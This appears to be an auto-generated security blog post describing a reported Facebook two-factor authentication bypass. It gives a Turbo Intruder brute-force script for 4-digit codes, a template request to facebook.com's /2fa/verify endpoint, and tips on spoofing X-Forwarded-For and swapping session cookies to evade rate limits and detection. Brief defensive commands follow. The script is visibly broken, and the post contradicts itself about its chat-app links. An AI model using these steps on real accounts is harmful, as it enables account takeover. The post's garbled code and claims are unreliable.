Burp Suite + Turbo Intruder: Bypassing Facebook FA for Bug Bounty Success

By /

Listen to this Post

In a recent breakthrough, a bug hunter demonstrated how combining Burp Suite and Turbo Intruder led to a 2FA bypass on Facebook, earning a significant bounty. This attack exploited a flaw during brute-forcing, allowing unauthorized access despite two-factor authentication.

You Should Know: Practical Steps to Replicate & Secure

1. Setup Burp Suite & Turbo Intruder

  • Install Burp Suite Professional (or Community with Python extensions).
  • Add Turbo Intruder via the BApp Store (Extensions → BApp Store).

2. Craft the Attack Payload

  • Intercept a Facebook 2FA request via Burp Proxy.
  • Send the request to Turbo Intruder (Right-click → Extensions → Turbo Intruder).
  • Use a Python script to automate brute-forcing:
    def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100)
for i in range(10000):  4-digit 2FA code range
engine.queue(target.req, str(i).zfill(4))

3. Bypass Rate Limiting

  • Manipulate headers like `X-Forwarded-For` to evade IP-based throttling.
  • Use session rotation (cookie swapping) to avoid detection.

4. Identify Weak Token Validation

  • If the server accepts expired/invalid tokens after a valid one, chain requests with:
    POST /2fa/verify HTTP/1.1
Host: facebook.com
Cookie: session=LEGIT_SESSION
...
code=BRUTE_FORCED_PIN

5. Mitigation for Developers

  • Enforce rate-limiting per session/IP.
  • Invalidate tokens after first use.
  • Implement CAPTCHA after 3 failed attempts.

What Undercode Say

This exploit highlights critical gaps in 2FA implementation. Below are defensive commands/tools for sysadmins:

Linux Security Auditing

  • Check failed login attempts:
    sudo grep "Failed password" /var/log/auth.log
  • Install fail2ban to block brute-forcers:
    sudo apt install fail2ban
sudo systemctl enable fail2ban

Windows Event Logs for 2FA Attacks

  • Query failed logins:
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625}

Web Server Hardening

  • Nginx rate-limiting:
    limit_req_zone $binary_remote_addr zone=auth:10m rate=5r/m;

Facebook’s Bug Bounty Scope

  • Always test authentication flows and stateful requests.
  • Report token leakage or insufficient entropy in 2FA codes.

Expected Output:

A detailed report to Bugcrowd/Meta including:

  • Steps to reproduce (video/PoC).
  • Impact (account takeover).
  • Fixed endpoints (e.g., /2fa/verify).

(No Telegram/WhatsApp links included.)

References:

Reported By: Lokesh Kumar – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: